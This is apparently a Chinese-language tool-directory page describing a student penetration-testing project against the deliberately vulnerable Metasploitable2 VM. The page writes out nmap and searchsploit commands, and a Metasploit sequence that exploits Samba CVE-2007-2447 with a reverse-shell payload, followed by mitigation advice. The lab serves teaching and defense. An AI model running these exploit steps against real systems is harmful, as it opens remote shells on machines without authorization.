Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Penetration-Testing-on-Metasploitable2 — 使用 Kali Linux 对 Metasploitable2 进行实战渗透测试项目。包含完整工作流程:Nmap 扫描、枚举、Metasploit 漏洞利用(Samba CVE-2007-2447)、后渗透验证和缓解步骤。仓库包含命令、输出以及展示攻击技术和防御建议的报告。 | Kitploit
工具/GitHubGitHub/seifeldienahmad/penetration-testing-on-metasploitable2
侦察漏洞扫描器网络映射漏洞分析漏洞利用后渗透利用渗透测试学习与教育实验室与实践

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHubseifeldienahmad/penetration-testing-on-metasploitable2

Penetration-Testing-on-Metasploitable2

使用 Kali Linux 对 Metasploitable2 进行实战渗透测试项目。包含完整工作流程:Nmap 扫描、枚举、Metasploit 漏洞利用(Samba CVE-2007-2447)、后渗透验证和缓解步骤。仓库包含命令、输出以及展示攻击技术和防御建议的报告。

查看仓库网站
111个月前尚未审核

实习项目 2 — Metasploitable2 渗透测试

  • 摘要: 本项目演示了完整的渗透测试工作流程:侦察、枚举、漏洞利用、后渗透验证以及缓解建议。使用的目标机器是 Metasploitable2,攻击机为 Kali Linux。

  • 工具: Kali Linux(攻击机) Nmap(侦察) Metasploit Framework(漏洞利用) SearchSploit / Exploit-DB(分类筛选)

执行的步骤:

  1. 扫描: sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x 识别出的服务(示例):vsftpd 2.3.4(端口 21 banner),Samba smbd 3.x(端口 445)。
  2. 枚举与分类筛选: searchsploit --nmap scans/target.xml searchsploit samba 3.0.20 将服务与潜在漏洞利用进行匹配(vsftpd 后门、Samba username-map)。
  3. 漏洞利用
  • 尝试利用 vsftpd 后门(CVE-2011-2523)——Nmap banner 存在但服务无响应;漏洞利用未创建会话。
  • 成功利用 Samba(CVE-2007-2447): msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit 获得交互式 shell 并验证了用户上下文。
  1. 后渗透
  • 验证了系统信息: id uname -a
  • 收集了证据和截图。
  1. 缓解建议
  • 定期扫描和资产清点。
  • 及时打补丁和升级版本(更新 Samba)。
  • 限制对关键端口的访问(防火墙规则)。
  • 禁用未使用的服务和匿名访问。
  • 对共享和账户应用最小权限。
  • 网络分段和日志记录/监控。
  • 事件响应规划。

结果 通过 Samba 漏洞利用成功获得远程 shell,记录了攻击路径,并制定了缓解计划。完整日志和命令输出存储在 scans/ 文件夹中。

下载工具